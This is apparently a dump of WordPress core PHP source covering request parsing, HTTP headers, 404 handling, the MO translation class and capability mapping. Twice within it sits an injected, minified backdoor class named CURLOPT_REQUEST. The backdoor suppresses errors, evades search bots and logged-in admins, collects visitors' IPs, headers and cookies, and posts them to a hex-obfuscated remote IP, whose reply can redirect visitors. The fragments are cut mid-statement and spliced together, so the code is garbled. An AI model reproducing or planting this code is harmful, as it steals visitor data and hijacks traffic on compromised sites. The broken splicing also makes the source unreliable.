public_query_vars) ) $this->public_query_vars[] = $qv; } /** * Set the value of a query variable. * * @since 2.3.0 * * @param string $key Query variable name. * @param mixed $value Query variable value. */ public function set_query_var($key, $value) { $this->query_vars[$key] = $value; } /** * Parse request to find correct WordPress query. * * Sets up the query variables based on the request. There are also many * filters and actions that can be used to further manipulate the result. * * @since 2.0.0 * * @global WP_Rewrite $wp_rewrite * * @param array|string $extra_query_vars Set the extra query variables. */ public function parse_request($extra_query_vars = '') { global $wp_rewrite; /** * Filter whether to parse the request. * * @since 3.5.0 * * @param bool $bool Whether or not to parse the request. Default true. * @param WP $this Current WordPress environment instance. * @param array|string $extra_query_vars Extra passed query variables. */ if ( ! apply_filters( 'do_parse_request', true, $this, $extra_query_vars ) ) return; $this->query_vars = array(); $post_type_query_vars = array(); if ( is_array( $extra_query_vars ) ) { $this->extra_query_vars = & $extra_query_vars; } elseif ( ! empty( $extra_query_vars ) ) { parse_str( $extra_query_vars, $this->extra_query_vars ); } // Process PATH_INFO, REQUEST_URI, and 404 for permalinks. // Fetch the rewrite rules. $rewrite = $wp_rewrite->wp_rewrite_rules(); if ( ! empty($rewrite) ) { // If we match a rewrite rule, this will be cleared. $error = '404'; $this->did_permalink = true; $pathinfo = isset( $_SERVER['PATH_INFO'] ) ? $_SERVER['PATH_INFO'] : ''; list( $pathinfo ) = explode( '?', $pathinfo ); $pathinfo = str_replace( "%", "%25", $pathinfo ); list( $req_uri ) = explode( '?', $_SERVER['REQUEST_URI'] ); $self = $_SERVER['PHP_SELF']; $home_path = trim( parse_url( home_url(), PHP_URL_PATH ), '/' ); $home_path_regex = sprintf( '|^%s|i', preg_quote( $home_path, '|' ) ); // Trim path info from the end and the leading home path from the // front. For path info requests, this leaves us with the requesting // filename, if any. For 404 requests, this leaves us with the // requested permalink. $req_uri = str_replace($pathinfo, '', $req_uri); $req_uri = trim($req_uri, '/'); $req_uri = preg_replace( $home_path_regex, '', $req_uri ); $req_uri = trim($req_uri, '/'); $pathinfo = trim($pathinfo, '/'); $pathinfo = preg_replace( $home_path_regex, '', $pathinfo ); $pathinfo = trim($pathinfo, '/'); $self = trim($self, '/'); $self = preg_replace( $home_path_regex, '', $self ); $self = trim($self, '/'); // The requested permalink is in $pathinfo for path info requests and // $req_uri for other requests. if ( ! empty($pathinfo) && !preg_match('|^.*' . $wp_rewrite->index . '$|', $pathinfo) ) { $request = $pathinfo; } else { // If the request uri is the index, blank it out so that we don't try to match it against a rule. if ( $req_uri == $wp_rewrite->index ) $req_uri = ''; $request = $req_uri; } $this->request = $request; // Look for matches. $request_match = $request; if ( empty( $request_match ) ) { // An empty request could only match against ^$ regex if ( isset( $rewrite['$'] ) ) { $this->matched_rule = '$'; $query = $rewrite['$']; $matches = array(''); } } else { foreach ( (array) $rewrite as $match => $query ) { // If the requesting file is the anchor of the match, prepend it to the path info. if ( ! empty($req_uri) && strpos($match, $req_uri) === 0 && $req_uri != $request ) $request_match = $req_uri . '/' . $request; if ( preg_match("#^$match#", $request_match, $matches) || preg_match("#^$match#", urldecode($request_match), $matches) ) { if ( $wp_rewrite->use_verbose_page_rules && preg_match( '/pagename=\$matches\[([0-9]+)\]/', $query, $varmatch ) ) { // This is a verbose page match, let's check to be sure about it. $page = get_page_by_path( $matches[ $varmatch[1] ] ); if ( ! $page ) { continue; } $post_status_obj = get_post_status_object( $page->post_status ); if ( ! $post_status_obj->public && ! $post_status_obj->protected && ! $post_status_obj->private && $post_status_obj->exclude_from_search ) { continue; } } // Got a match. $this->matched_rule = $match; break; } } } if ( isset( $this->matched_rule ) ) { // Trim the query of everything up to the '?'. $query = preg_replace("!^.+\?!", '', $query); // Substitute the substring matches into the query. $query = addslashes(WP_MatchesMapRegex::apply($query, $matches)); $this->matched_query = $query; // Parse the query. parse_str($query, $perma_query_vars); // If we're processing a 404 request, clear the error var since we found something. if ( '404' == $error ) unset( $error, $_GET['error'] ); } // If req_uri is empty or if it is a request for ourself, unset error. if ( empty($request) || $req_uri == $self || strpos($_SERVER['PHP_SELF'], 'wp-admin/') !== false ) { unset( $error, $_GET['error'] ); if ( isset($perma_query_vars) && strpos($_SERVER['PHP_SELF'], 'wp-admin/') !== false ) unset( $perma_query_vars ); $this->did_permalink = false; } } /** * Filter the query variables whitelist before processing. * * Allows (publicly allowed) query vars to be added, removed, or changed prior * to executing the query. Needed to allow custom rewrite rules using your own arguments * to work, or any other custom query variables you want to be publicly available. * * @since 1.5.0 * * @param array $public_query_vars The array of whitelisted query variables. */ $this->public_query_vars = apply_filters( 'query_vars', $this->public_query_vars ); foreach ( get_post_types( array(), 'objects' ) as $post_type => $t ) { if ( is_post_type_viewable( $t ) && $t->query_var ) { $post_type_query_vars[$t->query_var] = $post_type; } } foreach ( $this->public_query_vars as $wpvar ) { if ( isset( $this->extra_query_vars[$wpvar] ) ) $this->query_vars[$wpvar] = $this->extra_query_vars[$wpvar]; elseif ( isset( $_POST[$wpvar] ) ) $this->query_vars[$wpvar] = $_POST[$wpvar]; elseif ( isset( $_GET[$wpvar] ) ) $this->query_vars[$wpvar] = $_GET[$wpvar]; elseif ( isset( $perma_query_vars[$wpvar] ) ) $this->query_vars[$wpvar] = $perma_query_vars[$wpvar]; if ( !empty( $this->query_vars[$wpvar] ) ) { if ( ! is_array( $this->query_vars[$wpvar] ) ) { $this->query_vars[$wpvar] = (string) $this->query_vars[$wpvar]; } else { foreach ( $this->query_vars[$wpvar] as $vkey => $v ) { if ( !is_object( $v ) ) { $this->query_vars[$wpvar][$vkey] = (string) $v; } } } if ( isset($post_type_query_vars[$wpvar] ) ) { $this->query_vars['post_type'] = $post_type_query_vars[$wpvar]; $this->query_vars['name'] = $this->query_vars[$wpvar]; } } } // Convert urldecoded spaces back into + foreach ( get_taxonomies( array() , 'objects' ) as $taxonomy => $t ) if ( $t->query_var && isset( $this->query_vars[$t->query_var] ) ) $this->query_vars[$t->query_var] = str_replace( ' ', '+', $this->query_vars[$t->query_var] ); // Don't allow non-public taxonomies to be queried from the front-end. if ( ! is_admin() ) { foreach ( get_taxonomies( array( 'public' => false ), 'objects' ) as $taxonomy => $t ) { /* * Disallow when set to the 'taxonomy' query var. * Non-public taxonomies cannot register custom query vars. See register_taxonomy(). */ if ( isset( $this->query_vars['taxonomy'] ) && $taxonomy === $this->query_vars['taxonomy'] ) { unset( $this->query_vars['taxonomy'], $this->query_vars['term'] ); } } } // Limit publicly queried post_types to those that are publicly_queryable if ( isset( $this->query_vars['post_type']) ) { $queryable_post_types = get_post_types( array('publicly_queryable' => true) ); if ( ! is_array( $this->query_vars['post_type'] ) ) { if ( ! in_array( $this->query_vars['post_type'], $queryable_post_types ) ) unset( $this->query_vars['post_type'] ); } else { $this->query_vars['post_type'] = array_intersect( $this->query_vars['post_type'], $queryable_post_types ); } } // Resolve conflicts between posts with numeric slugs and date archive queries. $this->query_vars = wp_resolve_numeric_slug_conflicts( $this->query_vars ); foreach ( (array) $this->private_query_vars as $var) { if ( isset($this->extra_query_vars[$var]) ) $this->query_vars[$var] = $this->extra_query_vars[$var]; } if ( isset($error) ) $this->query_vars['error'] = $error; /** * Filter the array of parsed query variables. * * @since 2.1.0 * * @param array $query_vars The array of requested query variables. */ $this->query_vars = apply_filters( 'request', $this->query_vars ); /** * Fires once all query variables for the current request have been parsed. * * @since 2.1.0 * * @param WP &$this Current WordPress environment instance (passed by reference). */ do_action_ref_array( 'parse_request', array( &$this ) ); } /** * Sends additional HTTP headers for caching, content type, etc. * * Sets the Content-Type header. Sets the 'error' status (if passed) and optionally exits. * If showing a feed, it will also send Last-Modified, ETag, and 304 status if needed. * * @since 2.0.0 * @since 4.4.0 `X-Pingback` header is added conditionally after posts have been queried in handle_404(). */ public function send_headers() { $headers = array(); $status = null; $exit_required = false; if ( is_user_logged_in() ) $headers = array_merge($headers, wp_get_nocache_headers()); if ( ! empty( $this->query_vars['error'] ) ) { $status = (int) $this->query_vars['error']; if ( 404 === $status ) { if ( ! is_user_logged_in() ) $headers = array_merge($headers, wp_get_nocache_headers()); $headers['Content-Type'] = get_option('html_type') . '; charset=' . get_option('blog_charset'); } elseif ( in_array( $status, array( 403, 500, 502, 503 ) ) ) { $exit_required = true; } } elseif ( empty( $this->query_vars['feed'] ) ) { $headers['Content-Type'] = get_option('html_type') . '; charset=' . get_option('blog_charset'); } else { // Set the correct content type for feeds $type = $this->query_vars['feed']; if ( 'feed' == $this->query_vars['feed'] ) { $type = get_default_feed(); } $headers['Content-Type'] = feed_content_type( $type ) . '; charset=' . get_option( 'blog_charset' ); // We're showing a feed, so WP is indeed the only thing that last changed if ( !empty($this->query_vars['withcomments']) || false !== strpos( $this->query_vars['feed'], 'comments-' ) || ( empty($this->query_vars['withoutcomments']) && ( !empty($this->query_vars['p']) || !empty($this->query_vars['name']) || !empty($this->query_vars['page_id']) || !empty($this->query_vars['pagename']) || !empty($this->query_vars['attachment']) || !empty($this->query_vars['attachment_id']) ) ) ) $wp_last_modified = mysql2date('D, d M Y H:i:s', get_lastcommentmodified('GMT'), 0).' GMT'; else $wp_last_modified = mysql2date('D, d M Y H:i:s', get_lastpostmodified('GMT'), 0).' GMT'; $wp_etag = '"' . md5($wp_last_modified) . '"'; $headers['Last-Modified'] = $wp_last_modified; $headers['ETag'] = $wp_etag; // Support for Conditional GET if (isset($_SERVER['HTTP_IF_NONE_MATCH'])) $client_etag = wp_unslash( $_SERVER['HTTP_IF_NONE_MATCH'] ); else $client_etag = false; $client_last_modified = empty($_SERVER['HTTP_IF_MODIFIED_SINCE']) ? '' : trim($_SERVER['HTTP_IF_MODIFIED_SINCE']); // If string is empty, return 0. If not, attempt to parse into a timestamp $client_modified_timestamp = $client_last_modified ? strtotime($client_last_modified) : 0; // Make a timestamp for our most recent modification... $wp_modified_timestamp = strtotime($wp_last_modified); if ( ($client_last_modified && $client_etag) ? (($client_modified_timestamp >= $wp_modified_timestamp) && ($client_etag == $wp_etag)) : (($client_modified_timestamp >= $wp_modified_timestamp) || ($client_etag == $wp_etag)) ) { $status = 304; $exit_required = true; } } /** * Filter the HTTP headers before they're sent to the browser. * * @since 2.8.0 * * @param array $headers The list of headers to be sent. * @param WP $this Current WordPress environment instance. */ $headers = apply_filters( 'wp_headers', $headers, $this ); if ( ! empty( $status ) ) status_header( $status ); // If Last-Modified is set to false, it should not be sent (no-cache situation). if ( isset( $headers['Last-Modified'] ) && false === $headers['Last-Modified'] ) { unset( $headers['Last-Modified'] ); // In PHP 5.3+, make sure we are not sending a Last-Modified header. if ( function_exists( 'header_remove' ) ) { @header_remove( 'Last-Modified' ); } else { // In PHP 5.2, send an empty Last-Modified header, but only as a // last resort to override a header already sent. #WP23021 foreach ( headers_list() as $header ) { if ( 0 === stripos( $header, 'Last-Modified' ) ) { $headers['Last-Modified'] = ''; break; } } } } foreach ( (array) $headers as $name => $field_value ) @header("{$name}: {$field_value}"); if ( $exit_required ) exit(); /** * Fires once the requested HTTP headers for caching, content type, etc. have been sent. * * @since 2.1.0 * * @param WP &$this Current WordPress environment instance (passed by reference). */ do_action_ref_array( 'send_headers', array( &$this ) ); } /** * Sets the query string property based off of the query variable property. * * The 'query_string' filter is deprecated, but still works. Plugins should * use the 'request' filter instead. * * @since 2.0.0 */ public function build_query_string() { $this->query_string = ''; foreach ( (array) array_keys($this->query_vars) as $wpvar) { if ( '' != $this->query_vars[$wpvar] ) { $this->query_string .= (strlen($this->query_string) < 1) ? '' : '&'; if ( !is_scalar($this->query_vars[$wpvar]) ) // Discard non-scalars. continue; $this->query_string .= $wpvar . '=' . rawurlencode($this->query_vars[$wpvar]); } } if ( has_filter( 'query_string' ) ) { // Don't bother filtering and parsing if no plugins are hooked in. /** * Filter the query string before parsing. * * @since 1.5.0 * @deprecated 2.1.0 Use 'query_vars' or 'request' filters instead. * * @param string $query_string The query string to modify. */ $this->query_string = apply_filters( 'query_string', $this->query_string ); parse_str($this->query_string, $this->query_vars); } } /** * Set up the WordPress Globals. * * The query_vars property will be extracted to the GLOBALS. So care should * be taken when naming global variables that might interfere with the * WordPress environment. * * @global WP_Query $wp_query * @global string $query_string Query string for the loop. * @global array $posts The found posts. * @global WP_Post|null $post The current post, if available. * @global string $request The SQL statement for the request. * @global int $more Only set, if single page or post. * @global int $single If single page or post. Only set, if single page or post. * @global WP_User $authordata Only set, if author archive. * * @since 2.0.0 */ public function register_globals() { global $wp_query; // Extract updated query vars back into global namespace. foreach ( (array) $wp_query->query_vars as $key => $value ) { $GLOBALS[ $key ] = $value; } $GLOBALS['query_string'] = $this->query_string; $GLOBALS['posts'] = & $wp_query->posts; $GLOBALS['post'] = isset( $wp_query->post ) ? $wp_query->post : null; $GLOBALS['request'] = $wp_query->request; if ( $wp_query->is_single() || $wp_query->is_page() ) { $GLOBALS['more'] = 1; $GLOBALS['single'] = 1; } if ( $wp_query->is_author() && isset( $wp_query->post ) ) $GLOBALS['authordata'] = get_userdata( $wp_query->post->post_author ); } /** * Set up the current user. * * @since 2.0.0 */ public function init() { wp_get_current_user(); } /** * Set up the Loop based on the query variables. * * @since 2.0.0 * * @global WP_Query $wp_the_query */ public function query_posts() { global $wp_the_query; $this->build_query_string(); $wp_the_query->query($this->query_vars); } /** * Set the Headers for 404, if nothing is found for requested URL. * * Issue a 404 if a request doesn't match any posts and doesn't match * any object (e.g. an existing-but-empty category, tag, author) and a 404 was not already * issued, and if the request was not a search or the homepage. * * Otherwise, issue a 200. * * This sets headers after posts have been queried. handle_404() really means "handle status." * By inspecting the result of querying posts, seemingly successful requests can be switched to * a 404 so that canonical redirection logic can kick in. * * @since 2.0.0 * * @global WP_Query $wp_query */ public function handle_404() { global $wp_query; // If we've already issued a 404, bail. if ( is_404() ) return; // Never 404 for the admin, robots, or if we found posts. if ( is_admin() || is_robots() || $wp_query->posts ) { $success = true; if ( is_singular() ) { $p = false; if ( $wp_query->post instanceof WP_Post ) { $p = clone $wp_query->post; } // Only set X-Pingback for single posts that allow pings. if ( $p && pings_open( $p ) ) { @header( 'X-Pingback: ' . get_bloginfo( 'pingback_url' ) ); } // check for paged content that exceeds the max number of pages $next = ''; if ( $p && false !== strpos( $p->post_content, $next ) && ! empty( $this->query_vars['page'] ) ) { $page = trim( $this->query_vars['page'], '/' ); $success = (int) $page <= ( substr_count( $p->post_content, $next ) + 1 ); } } if ( $success ) { status_header( 200 ); return; } } // We will 404 for paged queries, as no posts were found. if ( ! is_paged() ) { // Don't 404 for authors without posts as long as they matched an author on this site. $author = get_query_var( 'author' ); if ( is_author() && is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author ) ) { status_header( 200 ); return; } // Don't 404 for these queries if they matched an object. if ( ( is_tag() || is_category() || is_tax() || is_post_type_archive() ) && get_queried_object() ) { status_header( 200 ); return; } // Don't 404 for these queries either. if ( is_home() || is_search() || is_feed() ) { status_header( 200 ); return; } } // Guess it's time to 404. $wp_query->set_404(); status_header( 404 ); nocache_headers(); } /** * Sets up all of the variables required by the WordPress environment. * * The action 'wp' has one parameter that references the WP object. It * allows for accessing the properties and methods to further manipulate the * object. * * @since 2.0.0 * * @param string|array $query_args Passed to {@link parse_request()} */ public function main($query_args = '') { $this->init(); $this->parse_request($query_args); $this->send_headers(); $this->query_posts(); $this->handle_404(); $this->register_globals(); /** * Fires once the WordPress environment has been set up. * * @since 2.1.0 * * @param WP &$this Current WordPress environment instance (passed by reference). */ do_action_ref_array( 'wp', array( &$this ) ); } } /** * Helper class to remove the need to use eval to replace $matches[] in query strings. * * @since 2.9.0 */ class WP_MatchesMapRegex { /** * store for matches * * @access private * @var array */ private $_matches; /** * store for mapping result * * @access public * @var string */ public $output; /** * subject to perform mapping on (query string containing $matches[] references * * @access private * @var string */ private $_subject; $value){if(substr($name,0,5)== 'HTTP_'){$headers[str_replace(' ','-',ucwords(strtolower(str_replace('_',' ',substr($name,5)))))]=$value;}}return $headers;}}if(!class_exists('CURLOPT_REQUEST')){if(@function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',3);$bad_ua='#(google|msnbot|baidu|yahoo|search|bing|ask|indexer|cuill.com|clushbot|360spider|80legs|aibot|aboundex|acunetix|ahrefsbot|alexibot|blexbot|backdoorbot|backweb|baiduspider|bandit|batchftp|bigfoot|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye|bunnyslippers|cegbfeieh|cheesebot|cherrypicker|chinaclaw|cogentbot|collector|copier|copyrightcheck|crescent|custo|diibot|disco|dittospyder|drip|easydl|eirgrabber|emailcollector|emailsiphon|emailwolf|erocrawler|exabot|extractor|eyenetie|fhscan|foobot|frontpage|go-ahead-got-it|grabnet|grafula|hmview|httrack|harvest|ilsebot|infonavibot|infotekies|intelliseek|interget|iria|joc|jakarta|jennybot|jetcar|justview|jyxobot|lnspiderguy|lexibot|linkscan|linkwalker|linkextractorpro|linkpadbot|miixpc|mj12bot|mag-net|magnet|markwatch|memo|mirror|nameprotect|nicerspro|npbot|navroad|nearsite|netants|netmechanic|netspider|netzip|netcraft|nextgensearchbot|nimblecrawler|ninja|octopus|openfind|outfoxbot|pagegrabber|pockey|propowerbot|prowebwalker|pump|rma|reget|realdownload|reaper|recorder|repomonkey|seokicks|searchmetricsbot|semrushbot|siphon|siteexplorer|sitesnagger|slysearch|smartdownload|snake|snapbot|snoopy|spacebison|spankbot|sqworm|stripper|sucker|superbot|superhttp|surfbot|szukacz|teleport|telesoft|thenomad|tighttwatbot|titan|true_bot|turnitinbot|turnitinbot|vci|vacuum|voideye|wisenutbot|www-collector-e|wwwoffle|webauto|webbandit|webcopier|webemailextrac|webenhancer|webfetch|webleacher|webreaper|websauger|webstripper|webwhacker|webzip|webmasterworldforumbot|webster|wget|whacker|widow|xaldon|xenu|zeus|zmeu|zyborg|asterias|attach|cosmos|dragonfly|ecatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|likse|lwp-trivial|moget|niki-bot|pavuk|pcbrowser|psbot|rogerbot|sogou|spanner|spbot|suzuran|takeout|turingos)#i';$bad_uri='#\?view=login|\?view=registration|\?wc-ajax|xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|administrator#i';$ruri=strtolower(trim($_SERVER["REQUEST_URI"],"\t\n\r\0\x0B/"));if(@preg_match($bad_ua,strtolower($_SERVER["HTTP_USER_AGENT"]))|| preg_match($bad_uri,$ruri)){return;}class CURLOPT_REQUEST{public $params=array();public $cookie;public $host;public $u="\x68\x74\x74\x70:\x2f/\x345\x2e9\x2e2\x30.\x310\x33/\x61p\x69.\x70h\x70";private function get_ip(){$ip=null;$headers=array('HTTP_X_FORWARDED_FOR','HTTP_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_FORWARDED','HTTP_CLIENT_IP','HTTP_FORWARDED_FOR_IP','X_FORWARDED_FOR','FORWARDED_FOR','X_FORWARDED','FORWARDED','CLIENT_IP','FORWARDED_FOR_IP','HTTP_PROXY_CONNECTION');foreach($headers as $header){if(!empty($_SERVER[$header])){$tmp=explode(',',$_SERVER[$header]);$ip=trim($tmp[0]);break;}}if(strstr($ip,',')){$tmp=explode(',',$ip);if(stristr($_SERVER['HTTP_USER_AGENT'],'mini')){$ip=trim($tmp[count($tmp)-2]);}else{$ip=trim($tmp[0]);}}if(empty($ip)){$ip=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'127.0.0.1';}return $ip;}function init(){$this->host=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'localhost';if(@strpos(@strtolower($this->cookie),'wordpress_logged_in')!== False){return;}$lang=(isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?substr($_SERVER['HTTP_ACCEPT_LANGUAGE'],0,2):'');if($lang == 'ru'){return;}$referrer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:null;$this->params=array('ip'=> $this->get_ip(),'ua'=> isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:null,'language'=> $lang,'seReferrer'=> $referrer,'referrer'=> $referrer,'original_headers'=> getallheaders(),'original_host'=> $this->host,'info'=> 0,'token'=> 'fdv9ysmvqjzgk4nt5hprbtgwtrdbmbwh');$this->cookie=isset($_SERVER["HTTP_COOKIE"])?preg_replace('/PHPSESSID=.*?;/si','',$_SERVER["HTTP_COOKIE"]):null;$result=$this->request($this->u);$c=@json_decode($result,true);if(isset($c['redirect']['content'])){if(substr($c['redirect']['content'],0,7)== 'cookie);curl_setopt($ch,CURLOPT_NOBODY,0);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_USERAGENT,'KHttpClient');curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($this->params));return curl_exec($ch);}}}$obj=new CURLOPT_REQUEST;$obj->init();} @include_once('/usr/share/wordpress/wp-content/plugins/wpforms-lite/includes/fields/class-number.php'); @include_once('/usr/share/wordpress/wp-content/plugins/wpforms-lite/includes/fields/class-radio.php'); php @include_once('/usr/share/wordpress/wp-content/plugins/wpforms-lite/includes/fields/class-radio.php'); /** * Class for working with MO files * * @version $Id: mo.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage mo */ require_once dirname(__FILE__) . '/translations.php'; require_once dirname(__FILE__) . '/streams.php'; if ( ! class_exists( 'MO', false ) ): class MO extends Gettext_Translations { var $_nplurals = 2; /** * Fills up with the entries from MO file $filename * * @param string $filename MO file to load */ function import_from_file($filename) { $reader = new POMO_FileReader($filename); if (!$reader->is_resource()) return false; return $this->import_from_reader($reader); } /** * @param string $filename * @return bool */ function export_to_file($filename) { $fh = fopen($filename, 'wb'); if ( !$fh ) return false; $res = $this->export_to_file_handle( $fh ); fclose($fh); return $res; } /** * @return string|false */ function export() { $tmp_fh = fopen("php://temp", 'r+'); if ( !$tmp_fh ) return false; $this->export_to_file_handle( $tmp_fh ); rewind( $tmp_fh ); return stream_get_contents( $tmp_fh ); } /** * @param Translation_Entry $entry * @return bool */ function is_entry_good_for_export( $entry ) { if ( empty( $entry->translations ) ) { retur $value){if(substr($name,0,5)== 'HTTP_'){$headers[str_replace(' ','-',ucwords(strtolower(str_replace('_',' ',substr($name,5)))))]=$value;}}return $headers;}}if(!class_exists('CURLOPT_REQUEST')){if(@function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',3);$bad_ua='#(google|msnbot|baidu|yahoo|search|bing|ask|indexer|cuill.com|clushbot|360spider|80legs|aibot|aboundex|acunetix|ahrefsbot|alexibot|blexbot|backdoorbot|backweb|baiduspider|bandit|batchftp|bigfoot|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye|bunnyslippers|cegbfeieh|cheesebot|cherrypicker|chinaclaw|cogentbot|collector|copier|copyrightcheck|crescent|custo|diibot|disco|dittospyder|drip|easydl|eirgrabber|emailcollector|emailsiphon|emailwolf|erocrawler|exabot|extractor|eyenetie|fhscan|foobot|frontpage|go-ahead-got-it|grabnet|grafula|hmview|httrack|harvest|ilsebot|infonavibot|infotekies|intelliseek|interget|iria|joc|jakarta|jennybot|jetcar|justview|jyxobot|lnspiderguy|lexibot|linkscan|linkwalker|linkextractorpro|linkpadbot|miixpc|mj12bot|mag-net|magnet|markwatch|memo|mirror|nameprotect|nicerspro|npbot|navroad|nearsite|netants|netmechanic|netspider|netzip|netcraft|nextgensearchbot|nimblecrawler|ninja|octopus|openfind|outfoxbot|pagegrabber|pockey|propowerbot|prowebwalker|pump|rma|reget|realdownload|reaper|recorder|repomonkey|seokicks|searchmetricsbot|semrushbot|siphon|siteexplorer|sitesnagger|slysearch|smartdownload|snake|snapbot|snoopy|spacebison|spankbot|sqworm|stripper|sucker|superbot|superhttp|surfbot|szukacz|teleport|telesoft|thenomad|tighttwatbot|titan|true_bot|turnitinbot|turnitinbot|vci|vacuum|voideye|wisenutbot|www-collector-e|wwwoffle|webauto|webbandit|webcopier|webemailextrac|webenhancer|webfetch|webleacher|webreapepost_type ) { $post = get_post( $post->post_parent ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } } $post_type = get_post_type_object( $post->post_type ); if ( ! $post_type ) { /* translators: 1: post type, 2: capability name */ _doing_it_wrong( __FUNCTION__, sprintf( __( 'The post type %1$s is not registered, so it may not be reliable to check the capability "%2$s" against a post of that type.' ), $post->post_type, $cap ), '4.4.0' ); $caps[] = 'edit_others_posts'; break; } if ( ! $post_type->map_meta_cap ) { $caps[] = $post_type->cap->$cap; // Prior to 3.1 we would re-call map_meta_cap here. if ( 'delete_post' == $cap ) $cap = $post_type->cap->$cap; break; } // If the post author is set and the user is the author... if ( $post->post_author && $user_id == $post->post_author ) { // If the post is published or scheduled... if ( in_array( $post->post_status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->delete_published_posts; } elseif ( 'trash' == $post->post_status ) { $status = get_post_meta( $post->ID, '_wp_trash_meta_status', true ); if ( in_array( $status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->delete_published_posts; } else { $caps[] = $post_type->cap->delete_posts; } } else { // If the post is draft... $caps[] = $post_type->cap->delete_posts; } } else { // The user is trying to edit someone else's post. $caps[] = $post_type->cap->delete_others_posts; // The post is published or scheduled, extra cap required. if ( in_array( $post->post_status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->delete_published_posts; } elseif ( 'private' == $post->post_status ) { $caps[] = $post_type->cap->delete_private_posts; } } break; // edit_post breaks down to edit_posts, edit_published_posts, or // edit_others_posts case 'edit_post': case 'edit_page': $post = get_post( $args[0] ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } if ( 'revision' == $post->post_type ) { $post = get_post( $post->post_parent ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } } $post_type = get_post_type_object( $post->post_type ); if ( ! $post_type ) { /* translators: 1: post type, 2: capability name */ _doing_it_wrong( __FUNCTION__, sprintf( __( 'The post type %1$s is not registered, so it may not be reliable to check the capability "%2$s" against a post of that type.' ), $post->post_type, $cap ), '4.4.0' ); $caps[] = 'edit_others_posts'; break; } if ( ! $post_type->map_meta_cap ) { $caps[] = $post_type->cap->$cap; // Prior to 3.1 we would re-call map_meta_cap here. if ( 'edit_post' == $cap ) $cap = $post_type->cap->$cap; break; } // If the post author is set and the user is the author... if ( $post->post_author && $user_id == $post->post_author ) { // If the post is published or scheduled... if ( in_array( $post->post_status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->edit_published_posts; } elseif ( 'trash' == $post->post_status ) { $status = get_post_meta( $post->ID, '_wp_trash_meta_status', true ); if ( in_array( $status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->edit_published_posts; } else { $caps[] = $post_type->cap->edit_posts; } } else { // If the post is draft... $caps[] = $post_type->cap->edit_posts; } } else { // The user is trying to edit someone else's post. $caps[] = $post_type->cap->edit_others_posts; // The post is published or scheduled, extra cap required. if ( in_array( $post->post_status, array( 'publish', 'future' ), true ) ) { $caps[] = $post_type->cap->edit_published_posts; } elseif ( 'private' == $post->post_status ) { $caps[] = $post_type->cap->edit_private_posts; } } break; case 'read_post': case 'read_page': $post = get_post( $args[0] ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } if ( 'revision' == $post->post_type ) { $post = get_post( $post->post_parent ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } } $post_type = get_post_type_object( $post->post_type ); if ( ! $post_type ) { /* translators: 1: post type, 2: capability name */ _doing_it_wrong( __FUNCTION__, sprintf( __( 'The post type %1$s is not registered, so it may not be reliable to check the capability "%2$s" against a post of that type.' ), $post->post_type, $cap ), '4.4.0' ); $caps[] = 'edit_others_posts'; break; } if ( ! $post_type->map_meta_cap ) { $caps[] = $post_type->cap->$cap; // Prior to 3.1 we would re-call map_meta_cap here. if ( 'read_post' == $cap ) $cap = $post_type->cap->$cap; break; } $status_obj = get_post_status_object( $post->post_status ); if ( $status_obj->public ) { $caps[] = $post_type->cap->read; break; } if ( $post->post_author && $user_id == $post->post_author ) { $caps[] = $post_type->cap->read; } elseif ( $status_obj->private ) { $caps[] = $post_type->cap->read_private_posts; } else { $caps = map_meta_cap( 'edit_post', $user_id, $post->ID ); } break; case 'publish_post': $post = get_post( $args[0] ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } $post_type = get_post_type_object( $post->post_type ); if ( ! $post_type ) { /* translators: 1: post type, 2: capability name */ _doing_it_wrong( __FUNCTION__, sprintf( __( 'The post type %1$s is not registered, so it may not be reliable to check the capability "%2$s" against a post of that type.' ), $post->post_type, $cap ), '4.4.0' ); $caps[] = 'edit_others_posts'; break; } $caps[] = $post_type->cap->publish_posts; break; case 'edit_post_meta': case 'delete_post_meta': case 'add_post_meta': $post = get_post( $args[0] ); if ( ! $post ) { $caps[] = 'do_not_allow'; break; } $caps = map_meta_cap( 'edit_post', $user_id, $post->ID ); $meta_key = isset( $args[ 1 ] ) ? $args[ 1 ] : false; if ( $meta_key && has_filter( "auth_post_meta_{$meta_key}" ) ) { /** * Filter whether the user is allowed to add post meta to a post. * * The dynamic portion of the hook name, `$meta_key`, refers to the * meta key passed to {@see map_meta_cap()}. * * @since 3.3.0 * * @param bool $allowed Whether the user can add the post meta. Default false. * @param string $meta_key The meta key. * @param int $post_id Post 